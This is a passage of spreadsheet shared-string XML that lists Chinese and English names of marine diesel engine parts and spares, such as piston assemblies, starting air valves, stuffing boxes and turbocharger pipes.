        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套冷却水出口主管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器冷却水出口管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座滑油出口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管路接口布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞冷却系统内管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞冷却系统外管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞头装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环拆装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞裙组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钳子</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柱塞总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柱塞组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>指示器箱体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>指示板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表管件装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压泵压力表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表减震器装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力调节弹簧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力开关支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表安装板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>棘轮手柄</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维修包</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测温电阻器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>回路阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>杆端轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚筒</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶隔振</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防爆片装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱泄放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱泄放管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气接管</t>
    </r>
  </si>
  <si>
    <r>
      <t>SCAVENGING AIR DUCT ASSEMBLY</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2/2</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱防爆阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>口琴阀阀体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>口琴阀装配</t>
    </r>
  </si>
  <si>
    <r>
      <t>SCAVENGING DISCHARGE PIPE</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2/2</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱连接管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹铆钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹接座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>海水滤器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封圈组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向阀装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧撑装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>勾当扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬套支座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空转轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备件箱总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>速度控制器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功阀阀杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拼合锥形销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>短管阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函弹簧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气弹簧泄放管布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气弹簧管装配（支管）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气弹簧管装配（主管）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧锁紧垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀大修工具支座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀支座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表板支座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油器支座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气连接管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气控制管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气控制阀装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气主管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气止回阀装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气瓶</t>
    </r>
  </si>
  <si>
    <r>
      <t>STARTING AIR VALVE</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>VALVE STEM</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动阀阀杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蒸汽加热管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蒸汽加热主管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蒸汽加热管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蒸汽加热管装配（泄放管）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蒸汽加热管装配（喷油器泄放）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蒸汽加热管装配（主管）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蒸汽加热管装配（油泵泄放）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>塌台</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停止阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座滤网</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函油环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函支座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函锁紧环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮轴支座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函泄放管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器出口管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器滑油出口管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器滑油进口管装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力块拆卸工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油箱盖板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度控制阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力开关测试回路</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器试验管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器压力测试工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>表盘式温度计</t>
    </r>
  </si>
  <si>
    <r>
      <t>THERMOMETER UNIT (100</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
      </rPr>
      <t>ﾟ</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>C)</t>
    </r>
  </si>
  <si>
    <r>
      <t>THERMOMETER UNIT (200</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
      </rPr>
      <t>ﾟ</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>C)</t>
    </r>
  </si>
  <si>
    <r>
      <t>THERMOMETER UNIT (500</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
      </rPr>
      <t>ﾟ</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>C)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承油温测量装配</t>
    </r>
  </si>
  <si>
    <r>
      <t>THRUST BEARING</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>OIL FENCE</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承支座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承推力块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓装配</t>
    </r>
  </si>
  <si>
    <r>
      <t>TIE BOLT</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>BOLT</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函锁紧环组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸边垫圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器支撑装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器气侧泄放管</t>
    </r>
  </si>
  <si>
    <r>
      <t>TURNING GEAR ASSEMBLY  1/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2/2</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机电机</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部轴瓦</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀体组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动停止阀阀体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起停切换箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
